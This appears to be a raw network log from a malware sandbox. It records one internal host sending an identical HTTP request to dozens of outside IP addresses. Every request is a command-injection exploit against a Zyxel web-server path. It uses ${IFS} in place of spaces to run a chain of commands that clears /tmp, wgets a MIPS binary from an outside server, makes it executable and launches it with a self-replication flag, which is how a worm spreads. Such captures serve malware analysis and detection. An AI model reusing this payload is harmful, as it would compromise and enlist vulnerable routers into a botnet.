                                                  Jan 19, 2024 18:23:40.734256983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  685192.168.2.133486096.246.218.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734316111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  686192.168.2.134856880.220.231.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734353065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  687192.168.2.1354792194.99.132.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734384060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  688192.168.2.133362470.92.234.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734428883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  689192.168.2.134440045.238.135.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734471083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  690192.168.2.1345462113.88.11.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734518051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  691192.168.2.1338006152.10.56.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734538078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  692192.168.2.1355604218.173.159.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734595060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  693192.168.2.1352490180.11.76.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734642029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  694192.168.2.134692619.230.126.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734667063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  695192.168.2.134697483.123.62.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734707117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  696192.168.2.135994420.114.88.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734747887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  697192.168.2.1344560163.26.47.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734805107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  698192.168.2.1336396134.176.138.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734811068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  699192.168.2.1348698138.39.13.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734836102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  700192.168.2.1348896114.134.226.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734918118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  701192.168.2.1334608179.134.15.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734972954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  702192.168.2.1343530135.212.193.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734997034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  703192.168.2.1346578188.49.100.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735027075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  704192.168.2.133561464.137.221.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735061884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  705192.168.2.1332836125.73.116.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735116959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  706192.168.2.1358358220.27.40.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735141993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  707192.168.2.1339804144.116.32.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735188961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  708192.168.2.1337972172.67.196.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735219955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  709192.168.2.135889437.72.52.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735266924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  710192.168.2.1354572171.156.14.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735301018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  711192.168.2.1342116140.150.159.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735344887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  712192.168.2.133703851.206.174.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735397100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  713192.168.2.133940081.236.106.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735447884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  714192.168.2.1354974188.98.77.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735454082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  715192.168.2.1335386208.27.169.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735487938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  716192.168.2.135504227.52.104.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735512972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  717192.168.2.135098881.89.231.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735569954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  718192.168.2.1353000121.163.208.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735615015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  719192.168.2.13404188.58.181.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735652924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  720192.168.2.1351380134.242.244.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735706091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  721192.168.2.1352256104.10.79.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735759020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  722192.168.2.1340204218.140.122.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735780001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  723192.168.2.1357732141.66.109.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735800028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  724192.168.2.13447449.4.156.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735837936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  725192.168.2.133391268.122.203.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735871077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  726192.168.2.13434964.126.225.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735917091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  727192.168.2.135072050.219.233.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735937119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  728192.168.2.133940645.46.246.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.735989094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  729192.168.2.135777850.114.247.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736016035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  730192.168.2.1357506113.112.54.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736067057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  731192.168.2.1360456104.224.22.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736100912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  732192.168.2.13346829.57.151.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736146927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  733192.168.2.1358906186.112.94.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736175060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  734192.168.2.1348962143.53.161.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736207962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  735192.168.2.1360680102.155.178.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736244917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  736192.168.2.1338306141.165.129.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736304045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  737192.168.2.133839476.124.86.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736323118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  738192.168.2.134052812.246.255.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736354113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  739192.168.2.1349364157.53.231.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736417055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  740192.168.2.1340570213.12.195.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736458063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  741192.168.2.1344816171.118.198.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736486912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  742192.168.2.1344288173.32.85.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736519098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  743192.168.2.1345782168.100.221.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736561060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  744192.168.2.1353576216.126.167.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736607075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  745192.168.2.1338784153.81.104.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736639977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  746192.168.2.1345594111.185.133.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736673117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  747192.168.2.1347086213.3.32.153443
                                                  TimestampBytes transferredDirectionData
